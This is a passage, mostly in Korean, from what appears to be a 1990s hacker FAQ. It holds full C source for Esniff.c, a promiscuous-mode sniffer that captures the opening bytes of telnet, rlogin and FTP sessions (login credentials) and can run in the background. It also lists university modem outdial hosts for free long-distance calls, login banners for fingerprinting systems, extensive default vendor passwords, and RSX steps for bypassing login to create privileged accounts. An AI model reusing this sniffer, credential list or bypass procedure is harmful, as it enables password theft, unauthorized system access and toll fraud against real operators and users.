nfswatch /* Available via anonymous ftp */
Linux tcpdump /* Available via anonymous ftp at */
/* sunsite.unc.edu */
/* /pub/Linux/system/Network/management/ */
SGI Irix nfswatch /* Available via anonymous ftp */
Etherman
tcpdump /* Available via anonymous ftp */
Solaris snoop
tcpdump
SunOS etherfind
nfswatch /* Available via anonymous ftp */
tcpdump /* Available via anonymous ftp */
DOS ETHLOAD /* Available via anonymous ftp as */
/* ethld104.zip */
The Gobbler /* Available via anonymous ftp */
LanPatrol
LanWatch
Netmon
Netwatch
Netzhack /* Available via anonymous ftp at */
/* mistress.informatik.unibw-muenchen.de */
/* /pub/netzhack.mac */
Macintosh Etherpeek
여기에 예제 코드가 있다.
/* Esniff.c */
#include <stdio.h>
#include <ctype.h>
#include <string.h>
#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <arpa/inet.h>
#define ERR stderr
char *malloc();
char *device,
*ProgName,
*LogName;
FILE *LOG;
int debug=0;
#define NIT_DEV "/dev/nit"
#define CHUNKSIZE 4096 /* device buffer size */
int if_fd = -1;
int Packet[CHUNKSIZE+32];
void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
exit(err); }
void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
exit(err); }
#define IP ((struct ip *)Packet)
#define IP_OFFSET (0x1FFF)
#define SZETH (sizeof(struct ether_header))
#define IPLEN (ntohs(ip->ip_len))
#define IPHLEN (ip->ip_hl)
#define TCPOFF (tcph->th_off)
#define IPS (ip->ip_src)
#define IPD (ip->ip_dst)
#define TCPS (tcph->th_sport)
#define TCPD (tcph->th_dport)
#define IPeq(s,t) ((s).s_addr == (t).s_addr)
#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))
#define MAXBUFLEN (128)
time_t LastTIME = 0;
struct CREC {
struct CREC *Next,
*Last;
time_t Time; /* start time */
struct in_addr SRCip,
DSTip;
u_int SRCport, /* src/dst ports */
DSTport;
u_char Data[MAXBUFLEN+2]; /* important stuff :-) */
u_int Length; /* current data length */
u_int PKcnt; /* # pkts */
u_long LASTseq;
};
struct CREC *CLroot = NULL;
char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);
return( (he)?(he->h_name):(inet_ntoa(ip)) );
}
char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
SFL(0,TH_FIN, 'F');
SFL(1,TH_SYN, 'S');
SFL(2,TH_RST, 'R');
SFL(3,TH_PUSH,'P');
SFL(4,TH_ACK, 'A');
SFL(5,TH_URG, 'U');
iobuf[6]=0;
return(iobuf);
}
char *SERVp(port)
register u_int port;
{ static char buf[10];
register char *p;
switch(port) {
case IPPORT_LOGINSERVER: p="rlogin"; break;
case IPPORT_TELNET: p="telnet"; break;
case IPPORT_SMTP: p="smtp"; break;
case IPPORT_FTP: p="ftp"; break;
default: sprintf(buf,"%u",port); p=buf; break;
}
return(p);
}
char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
p[strlen(p)-6]=0; /* strip " YYYY\n" */
return(p);
}
char *NOWtm()
{ time_t tm;
time(&tm);
return( Ptm(&tm) );
}
#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))
/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
register struct CREC *CLtmp = \
(struct CREC *)malloc(sizeof(struct CREC)); \
time( &(CLtmp->Time) ); \
CLtmp->SRCip.s_addr = SIP.s_addr; \
CLtmp->DSTip.s_addr = DIP.s_addr; \
CLtmp->SRCport = SPORT; \
CLtmp->DSTport = DPORT; \
CLtmp->Length = MIN(LEN,MAXBUFLEN); \
bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
CLtmp->PKcnt = 1; \
CLtmp->Next = CLroot; \
CLtmp->Last = NULL; \
CLroot = CLtmp; \
}
register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;
while(CLr != NULL) {
if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
break;
CLr = CLr->Next;
}
return(CLr);
}
#define ADDDATA_NODE(CL,DATA,LEN) { \
bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
CL->Length += LEN; \
}
#define PR_DATA(dp,ln) { \
register u_char lastc=0; \
while(ln-- >0) { \
if(*dp < 32) { \
switch(*dp) { \
case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
break; \
case '\r': \
case '\n': fprintf(LOG,"\n : "); \
break; \
default : fprintf(LOG,"^%c", (*dp + 64)); \
break; \
} \
} else { \
if(isprint(*dp)) fputc(*dp,LOG); \
else fprintf(LOG,"(%d)",*dp); \
} \
lastc = *dp++; \
} \
fflush(LOG); \
}
void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
fprintf(LOG," DATA: ");
{ register u_int i = CLe->Length;
register u_char *p = CLe->Data;
PR_DATA(p,i);
PR_DATA(d,dl);
}
fprintf(LOG,"\n-- \n");
fflush(LOG);
if(CLe->Next != NULL)
CLe->Next->Last = CLe->Last;
if(CLe->Last != NULL)
CLe->Last->Next = CLe->Next;
else
CLroot = CLe->Next;
free(CLe);
}
/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
time_t tm; \
time(&tm); \
if(LastTIME<tm) { \
register struct CREC *CLe,*CLt = CLroot; \
LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
while(CLe=CLt) { \
CLt=CLe->Next; \
if(CLe->Time <tm) \
END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
} \
} \
}
void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
{
register struct ip *ip;
register struct tcphdr *tcph;
{ register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
if(EtherType < 0x600) {
EtherType = *(u_short *)(cp + SZETH + 6);
cp+=8; pktlen-=8;
}
if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
return;
}
/* ugh, gotta do an alignment :-( */
bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
ip = (struct ip *)Packet;
if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
return;
tcph = (struct tcphdr *)(Packet + IPHLEN);
if(!( (TCPD == IPPORT_TELNET) ||
(TCPD == IPPORT_LOGINSERVER) ||
(TCPD == IPPORT_FTP)
)) return;
{ register struct CREC *CLm;
register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
register u_char *p = (u_char *)Packet;
p += ((IPHLEN * 4) + (TCPOFF * 4));
if(debug) {
fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
}
if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
CLm->PKcnt++;
if(length>0)
if( (CLm->Length + length) < MAXBUFLEN ) {
ADDDATA_NODE( CLm, p,length);
} else {
END_NODE( CLm, p,length, "DATA LIMIT");
}
if(TCPFL(TH_FIN|TH_RST)) {
END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
}
} else {
if(TCPFL(TH_SYN)) {
ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
}
}
IDLE_NODE();
}
}
/* signal handler
*/
void death()
{ register struct CREC *CLe;
while(CLe=CLroot)
END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
fflush(LOG);
if(LOG != stdout)
fclose(LOG);
exit(1);
}
/* opens network interface, performs ioctls and reads from it,
* passing data to filter function
*/
void do_it()
{
int cc;
char *buf;
u_short sp_ts_len;
if(!(buf=malloc(CHUNKSIZE)))
Pexit(1,"Eth: malloc");
/* this /dev/nit initialization code pinched from etherfind */
{
struct strioctl si;
struct ifreq ifr;
struct timeval timeout;
u_int chunksize = CHUNKSIZE;
u_long if_flags = NI_PROMISC;
if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
Pexit(1,"Eth: nit open");
if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
Pexit(1,"Eth: ioctl (I_SRDOPT)");
si.ic_timout = INFTIM;
if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
timeout.tv_sec = 1;
timeout.tv_usec = 0;
si.ic_cmd = NIOCSTIME;
si.ic_len = sizeof(timeout);
si.ic_dp = (char *)&timeout;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
si.ic_cmd = NIOCSCHUNK;
si.ic_len = sizeof(chunksize);
si.ic_dp = (char *)&chunksize;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
si.ic_cmd = NIOCBIND;
si.ic_len = sizeof(ifr);
si.ic_dp = (char *)𝔦
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
si.ic_cmd = NIOCSFLAGS;
si.ic_len = sizeof(if_flags);
si.ic_dp = (char *)&if_flags;
if(ioctl(if_fd, I_STR, (char *)&si) < 0)
Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
Pexit(1,"Eth: ioctl (I_FLUSH)");
}
while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
register char *bp = buf,
*bufstop = (buf + cc);
while (bp < bufstop) {
register char *cp = bp;
register struct nit_bufhdr *hdrp;
hdrp = (struct nit_bufhdr *)cp;
cp += sizeof(struct nit_bufhdr);
bp += hdrp->nhb_totlen;
filter(cp, (u_long)hdrp->nhb_msglen);
}
}
Pexit((-1),"Eth: read");
}
/* Authorize your program, generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms" */
void getauth()
{ char *buf,*getpass(),*crypt();
char pwd[21],prmpt[81];
strcpy(pwd,AUTHPASSWD);
sprintf(prmpt,"(%s)UP? ",ProgName);
buf=getpass(prmpt);
if(strcmp(pwd,crypt(buf,pwd)))
exit(1);
}
*/
void main(argc, argv)
int argc;
char **argv;
{
char cbuf[BUFSIZ];
struct ifconf ifc;
int s,
ac=1,
backg=0;
ProgName=argv[0];
/* getauth(); */
LOG=NULL;
device=NULL;
while((ac<argc) && (argv[ac][0] == '-')) {
register char ch = argv[ac++][1];
switch(toupper(ch)) {
case 'I': device=argv[ac++];
break;
case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
Zexit(1,"Output file cant be opened\n");
break;
case 'B': backg=1;
break;
case 'D': debug=1;
break;
default : fprintf(ERR,
"Usage: %s [-b] [-d] [-i interface] [-f file]\n",
ProgName);
exit(1);
}
}
if(!device) {
if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
Pexit(1,"Eth: socket");
ifc.ifc_len = sizeof(cbuf);
ifc.ifc_buf = cbuf;
if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
Pexit(1,"Eth: ioctl");
close(s);
device = ifc.ifc_req->ifr_name;
}
fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
(debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
if(!LOG)
LOG=stdout;
signal(SIGINT, death);
signal(SIGTERM,death);
signal(SIGKILL,death);
signal(SIGQUIT,death);
if(backg && debug) {
fprintf(ERR,"[Cannot bg with debug on]\n");
backg=0;
}
if(backg) {
register int s;
if((s=fork())>0) {
fprintf(ERR,"[pid %d]\n",s);
exit(0);
} else if(s<0)
Pexit(1,"fork");
if( (s=open("/dev/tty",O_RDWR))>0 ) {
ioctl(s,TIOCNOTTY,(char *)NULL);
close(s);
}
}
fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
fflush(LOG);
do_it();
}
인터넷 아웃다이얼(Internet Outdial)이란?
인터넷 아웃다이얼이란 인터넷에 연결된 모뎀으로 그곳에
연결하여 다른 곳으로 전화를 할 수 있은 것이다. 정상적인 아웃다이얼은
지역 번호만을 호출한다. GOD(Global OutDial)은 장거리 전화을 할
수 있다. 아웃다이얼은 장거리 BBS를 호출할 수 있는 값싼 방법이다.
이 FAQ는 CoTNo #5에서 뽑아온 것이다.
인터넷 아웃다이얼 목록 v3.0
소개
요새 인터넷에 돌아 다니는 인터넷 아웃다이얼의 목록이
몇가지 있다. 다음에 나오는 것은 v 2.0과 다른 목록들을 합친 것이다.
다른 사람들의 것을 그냥 실은 다른 목록과는 달리 우리는 앉아서
하나씩 모두 테스트를 했다. 몇몇은 "접속거부" 또는 접속을
시도할 때 시간초과에 걸리기도 했다. 이런 것들은 죽은 것으로 했다.
Working Outdials
----------------
as of 12/29/94
NPA IP Address Instructions
--- ---------- ------------
215 isn.upenn.edu modem
217 dialout.cecer.army.mil atdt x,xxxXXXXX
218 modem.d.umn.edu atdt9,xxxXXXX
303 yuma.acns.colostate.edu 3020
412 myriad.pc.cc.cmu.edu 2600 Press D at the prompt
412 gate.cis.pitt.edu tn3270,
connect dialout.pitt.edu,
atdtxxxXXXX
413 dialout2400.smith.edu Ctrl } gets ENTER NUMBER: xxxxxxx
502 outdial.louisville.edu
502 uknet.uky.edu connect kecnet
@ dial: "outdial2400 or out"
602 acssdial.inre.asu.edu atdt8,,,,,[x][yyy]xxxyyyy
614 ns2400.acs.ohio-state.edu
614 ns9600.acs.ohio-state.edu
713 128.249.27.153 atdt x,xxxXXXX
714 modem.nts.uci.edu atdt[area]0[phone]
804 ublan.virginia.edu connect hayes, 9,,xxx-xxxx
804 ublan2.acc.virginia.edu connect telnet
connect hayes
Need Password
-------------
206 rexair.cac.washington.edu This is an unbroken password
303 yuma.ACNS.ColoState.EDU login: modem
404 128.140.1.239 .modem8|CR
415 annex132-1.EECS.Berkeley.EDU "dial1" or "dial2" or "dialer1"
514 cartier.CC.UMontreal.CA externe,9+number
703 wal-3000.cns.vt.edu dial2400 -aa
Dead/No Connect
---------------
201 idsnet
202 modem.aidt.edu
204 dial.cc.umanitoba.ca
204 umnet.cc.manitoba.ca "dial12" or "dial24"
206 dialout24.cac.washington.edu
207 modem-o.caps.maine.edu
212 B719-7e.NYU.EDU dial3/dial12/dial24
212 B719-7f.NYU.EDU dial3/dial12/dial24
212 DIALOUT-1.NYU.EDU dial3/dial12/dial24
212 FREE-138-229.NYU.EDU dial3/dial12/dial24
212 UP19-4b.NYU.EDU dial3/dial12/dial24
215 wiseowl.ocis.temple.edu "atz" "atdt 9xxxyyyy"
218 aa28.d.umn.edu "cli" "rlogin modem"
at "login:" type "modem"
218 modem.d.umn.edu Hayes 9,XXX-XXXX
301 dial9600.umd.edu
305 alcat.library.nova.edu
305 office.cis.ufl.edu
307 modem.uwyo.edu Hayes 0,XXX-XXXX
313 35.1.1.6 dial2400-aa or dial1200-aa
or dialout
402 dialin.creighton.edu
402 modem.criegthon.edu
404 broadband.cc.emory.edu ".modem8" or ".dialout"
408 dialout.scu.edu
408 dialout1200.scu.edu
408 dialout2400.scu.edu
408 dialout9600.scu.edu
413 dialout.smith.edu
414 modems.uwp.edu
416 annex132.berkely.edu atdt 9,,,,, xxx-xxxx
416 pacx.utcs.utoronto.ca modem
503 dialout.uvm.edu
513 dialout24.afit.af.mil
513 r596adi1.uc.edu
514 pacx.CC.UMontreal.CA externe#9 9xxx-xxxx
517 engdial.cl.msu.edu
602 dial9600.telcom.arizona.edu
603 dialout1200.unh.edu
604 dial24-nc00.net.ubc.ca
604 dial24-nc01.net.ubc.ca
604 dial96-np65.net.ubc.ca
604 gmodem.capcollege.bc.ca
604 hmodem.capcollege.bc.ca
609 128.119.131.11X (X= 1 - 4) Hayes
609 129.119.131.11x (x = 1 to 4)
609 wright-modem-1.rutgers.edu
609 wright-modem-2.rutgers.edu
612 modem_out12e7.atk.com
612 modem_out24n8.atk.com
614 ns2400.ircc.ohio-state.edu "dial"
615 dca.utk.edu dial2400 D 99k #
615 MATHSUN23.MATH.UTK.EDU dial 2400 d 99Kxxxxxxx
616 modem.calvin.edu
617 128.52.30.3 2400baud
617 dialout.lcs.mit.edu
617 dialout1.princeton.edu
617 isdn3.Princeton.EDU
617 jadwingymkip0.Princeton.EDU
617 lord-stanley.Princeton.EDU
617 mpanus.Princeton.EDU
617 mrmodem.wellesley.edu
617 old-dialout.Princeton.EDU
617 stagger.Princeton.EDU
617 sunshine-02.lcs.mit.edu
617 waddle.Princeton.EDU
619 128.54.30.1 atdt [area][phone]
619 dialin.ucsd.edu "dialout"
703 modem_pool.runet.edu
703 wal-3000.cns.vt.edu
713 128.249.27.154 "c modem96" "atdt 9xxx-xxxx"
or "Hayes"
713 modem12.bcm.tmc.edu
713 modem24.bcm.tmc.edu
713 modem24.bcm.tmc.edu
714 mdmsrv7.sdsu.edu atdt 8xxx-xxxx
714 modem24.nts.uci.edu
714 pub-gopher.cwis.uci.edu
801 dswitch.byu.edu "C Modem"
808 irmodem.ifa.hawaii.edu
902 star.ccs.tuns.ca "dialout"
916 129.137.33.72
916 cc-dnet.ucdavis.edu connect hayes/dialout
916 engr-dnet1.engr.ucdavis.edu UCDNET <ret> C KEYCLUB <ret>
??? 128.119.131.11X (1 - 4)
??? 128.200.142.5
??? 128.54.30.1 nue, X to discontinue, ? for Help
??? 128.6.1.41
??? 128.6.1.42
??? 129.137.33.72
??? 129.180.1.57
??? 140.112.3.2 ntu <none>
??? annexdial.rz.uni-duesseldorf.de
??? dial96.ncl.ac.uk
??? dialout.plk.af.mil
??? ee21.ee.ncu.edu.tw cs8005
??? im.mgt.ncu.edu.tw guest <none>
??? modem.cis.uflu.edu
??? modem.ireq.hydro.qc.ca
??? modems.csuohio.edu
??? sparc20.ncu.edu.tw u349633
??? sun2cc.nccu.edu.tw ?
??? ts-modem.une.oz.au
??? twncu865.ncu.edu.tw guest <none>
??? vtnet1.cns.ut.edu "CALL" or "call"
결론
죽은 아웃다이얼을 발견하거나, 명령이 바뀌었거나,
패스워드를 요구하거나 하면, 우리에게 연락하여 목록이 되도록 정확하게
할 수 있도록 해 주기 바란다. 목록에 추가하고 싶은 것이 있다면
우리에게 메일을 보내면 다음 버전의 모록이 나올 때, 자신의 이름을
옆에 넣어서 나오도록 하겠다. 즐겁게 이용하기를 ....
[편집자 주: 원래 출판이후에 이 문서가 갱신되었다]
AIX
~~~
IBM AIX Version 3 for RISC System/6000
(C) Copyrights by IBM and by others 1982, 1990.
login:
[AIX 시스템은 쉽게 알 수 있는데, 화면을 지우고 로그인 프롬프트를 화면 밑에]
[표시하는 유일한 Unix이기 때문이다.]
AS/400
~~~~~~
UserID?
Password?
Once in, type GO MAIN
CDC Cyber
~~~~~~~~~
WELCOME TO THE NOS SOFTWARE SYSTEM.
COPYRIGHT CONTROL DATA 1978, 1987.
88/02/16. 02.36.53. N265100
CSUS CYBER 170-730. NOS 2.5.2-678/3.
FAMILY:
패밀리 프롬프트에서 단지 리턴만을 치면 당므 프롬프트가 다음과 같이 나타난다.
USER NAME:
CISCO Router
~~~~~~~~~~~~
FIRST BANK OF TNO
95-866 TNO VirtualBank
REMOTE Router - TN043R1
Console Port
SN - 00000866
TN043R1>
DECserver
~~~~~~~~~
DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
DPS502-DS700
(c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
도움말이 필요하면 HELP를 친다.
Enter username> TNO
Local>
Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
MPE XL:
EXPECTED A :HELLO COMMAND. (CIERR 6057)
MPE XL:
EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424)
MPE XL:
GTN
~~~
WELCOME TO CITIBANK. PLEASE SIGN ON.
XXXXXXXX
@
PASSWORD =
@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PLEASE ENTER YOUR ID:-1->
PLEASE ENTER YOUR PASSWORD:-2->
CITICORP (CITY NAME). KEY GHELP FOR HELP.
XXX.XXX
PLEASE SELECT SERVICE REQUIRED.-3->
Lantronix Terminal Server
~~~~~~~~~~~~~~~~~~~~~~~~~
Lantronix ETS16 Version V3.1/1(940623)
Type HELP at the 'Local_15> ' prompt for assistance.
Login password>
Meridian Mail (Northern Telecom Phone/Voice Mail System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MMM MMMERIDIAN
MMMMM MMMMM
MMMMMM MMMMMM
MMM MMMMM MMM MMMMM MMMMM
MMM MMM MMM MMMMMM MMMMMM
MMM MMM MMM MMM MMM MMM
MMM MMM MMM MMMMM MMM
MMM MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
MMM MMM MMM MMM
Copyright (c) Northern Telecom, 1991
Novell ONLAN
~~~~~~~~~~~~
<Control-A aka smiley face>N
[시스템에 접근하기 위해서는 ONLAN/PC의 복사본을 가지고
있는 것이 제일 좋다.]
PC-Anywhere
~~~~~~~~~~~
<Control-A aka smiley face>P
[시스템에 접근하기 위해서는 PCAnywhere Remote의 복사본을
가지고 있는 것이 제일 좋다.]
PRIMOS
~~~~~~
PRIMENET 19.2.7F PPOA1
<any text>
ER!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
CONNECT
Primenet V 2.3 (system)
LOGIN (you)
User id? (system)
SAPB5 (you)
Password? (system)
DROWSAP (you)
OK, (system)
ROLM CBX II
~~~~~~~~~~~
ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568
BIND DATE: 7/APR/93
COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED.
ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM
COMPANY.
YOU HAVE ENTERED CPU 1
12:38:47 ON WEDNESDAY 2/15/1995
USERNAME: op
PASSWORD:
INVALID USERNAME-PASSWORD PAIR
ROLM-OSL
~~~~~~~~
MARAUDER10292 01/09/85(^G) 1 03/10/87 00:29:47
RELEASE 8003
OSL, PLEASE.
?
System75
~~~~~~~~
Login: root
INCORRECT LOGIN
Login: browse
Password:
Software Version: G3s.b16.2.2
Terminal Type (513, 4410, 4425): [513]
Tops-10
~~~~~~~
NIH Timesharing
NIH Tri-SMP 7.02-FF 16:30:04 TTY11
system 1378/1381/1453 Connected to Node Happy(40) Line # 12
Please LOGIN
.
VM/370
~~~~~~
VM/370
!
VM/ESA
~~~~~~
VM/ESA ONLINE
TBVM2 VM/ESA Rel 1.1 PUT 9200
USERID 와 PASSWORD를 치고 ENTER를 누른다.
(패스워드는 화면에 나타나지 않는다.)
USERID ===>
PASSWORD ===>
COMMAND ===>
Xylogics Annex Communications Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Annex Command Line Interpreter * Copyright 1991 Xylogics,
Inc.
Checking authorization, Please wait... -
Annex username: TNO - Optional security check
Annex password: - Not always present
Permission granted
annex:
XXX에서의 처음(default) 패스워드는 무엇인가?
AIX
~~~
guest guest
AS/400
~~~~~~
qsecofr qsecofr /* master security officer */
qsysopr qsysopr /* system operator */
qpgmr qpgmr /* default programmer */
also
ibm password
ibm 2222
ibm service
qsecofr 1111111
qsecofr 2222222
qserv qserv
qsvr qsvr
secofr secofr
qsrv ibmce1
DECserver
~~~~~~~~~
ACCESS
SYSTEM
Dynix (The library software, not the UnixOS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
('later'를 치면 로그인 프롬프트에서 빠져나올 수 있다.)
setup <no password>
library <no password>
circ <Social Security Number>
Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP
HELLO OP.OPERATOR
MGR CAROLIAN
MGR CCC
MGR CNAS
MGR CONV
MGR COGNOS
OPERATOR COGNOS
MANAGER COGNOS
OPERATOR DISC
MGR HPDESK
MGR HPWORD
FIELD HPWORD
MGR HPOFFICE
SPOOLMAN HPOFFICE
ADVMAIL HPOFFICE
MAIL HPOFFICE
WP HPOFFICE
MANAGER HPOFFICE
MGR HPONLY
FIELD HPP187
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MANAGER ITF3000
MAIL MAIL
MGR NETBASE
MGR REGO
MGR RJE
MGR ROBELLE
MANAGER SECURITY
MGR SECURITY
FIELD SERVICE
MANAGER SYS
MGR SYS
PCUSER SYS
RSBCMON SYS
OPERATOR SYS
OPERATOR SYSTEM
FIELD SUPPORT
OPERATOR SUPPORT
MANAGER TCH
MAIL TELESUP
MANAGER TELESUP
MGR TELESUP
SYS TELESUP
MGE VESOFT
MGE VESOFT
MGR WORD
MGR XLSERVER
일반적인 작업은 Pub, Sys, Data이다.
일반적인 패스워드는 HPOnly, TeleSup, HP, MPE, Manager,
GR, Remote이다.
Major BBS
~~~~~~~~~
Sysop Sysop
Mitel PBX
~~~~~~~~~
SYSTEM
NeXTSTEP
~~~~~~~~
root NeXT
signa signa
me <null> (Rumored to be correct, not checked)
Nomadic Computing Environment (NCE) on the Tadpole Technologies SPARCBook3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
fax <no password>
PICK O/S
~~~~~~~~
DSA # Desquetop System Administrator
DS
DESQUETOP
PHANTOM
Prolog
~~~~~~
PBX PBX
NETWORK NETWORK
NETOP <null>
Radio Shack Screen Savers
~~~~~~~~~~~~~~~~~~~~~~~~~
RS<STORE_ID_NUMBER>
Rolm
~~~~
CBX Defaults
op op
op operator
su super
admin pwp
eng engineer
PhoneMail Defaults
sysadmin sysadmin
tech tech
poll tech
RSX
~~~
SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM)
1,1/system (Directory [1,1] Password SYSTEM)
BATCH/BATCH
SYSTEM/MANAGER
USER/USER
Micro/RSX에 대한 디폴트 패스워드는:
MICRO/RSX
아니면 부팅 과정에서 날짜를 물을 경우 <CTRL-Z>를 친다. 그리고 다음을 이용하여 계정을 만든다.
RUN ACNT
또는 RUN $ACNT
(10 {oct}이하의 수는 특별한 권한이 있다.)
다시 부팅하여 날짜/시간 물음을 기다린다. ^C를 친다. 그리고 MCR 프롬프트에서 'abo at."을 친다. . 점을 만드시 포함한다!
이것이 잘 되면 , "acs lb0:/blks=1000"를 쳐서 다음 작업이 정지되지 않도록 약간의 스웝(swap) 공간을 확보한다. " run $acnt"라고 치고 7번이나 그 이하의 그룹의 어떤 계정의 패스워드라도 바꾼다.
^C는 제대로 작동하지 않을 수 있다. ^Z와 ESC를 시도해
본다. 3가지를 적절한 때나 그렇지 않은 때 모두 시도해 볼 수도 있다.
아무것도 제대로 되지 않을 경우, 정지 스위치로 적절하지 않은 날짜-시간
뒤에 시스템을 정치한다. 사용자 모드 PSW 1[4-7]xxxx. 를 찾고 R6에
177777를 넣는다. 기도를 드린다음 디스크를 쓰기 방지하고 다시 시스템을
시동한다. 이렇게 하면 아마도 간접적으로 시스템을 터뜨릴 것이다.
아마도 시스템이 완벽하게 보호되지 않았을 것이다.
SGI Irix
~~~~~~~~
4DGifts <no password>
guest <no password>
demos <no password>
lp <no password>
nuucp <no password>
tour <no password>
tutor <no password>
System 75
~~~~~~~~~
bcim bcimpw
bciim bciimpw
bcms bcmspw, bcms
bcnas bcnspw
blue bluepw
browse looker, browsepw
craft crftpw, craftpw, crack
cust custpw
enquiry enquirypw
field support
inads indspw, inadspw, inads
init initpw
kraft kraftpw
locate locatepw
maint maintpw, rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field
Taco Bell
~~~~~~~~~
rgm rollout
tacobell <null>
Verifone Junior 2.05
~~~~~~~~~~~~~~~~~~~~
Default password: 166816
VMS
~~~
field service
systest utep
XON / XON Junior
~~~~~~~~~~~~~~~~
Default password: 166831
이 FAQ는 Theora가 작성한 것이다.
트로이 목마 :
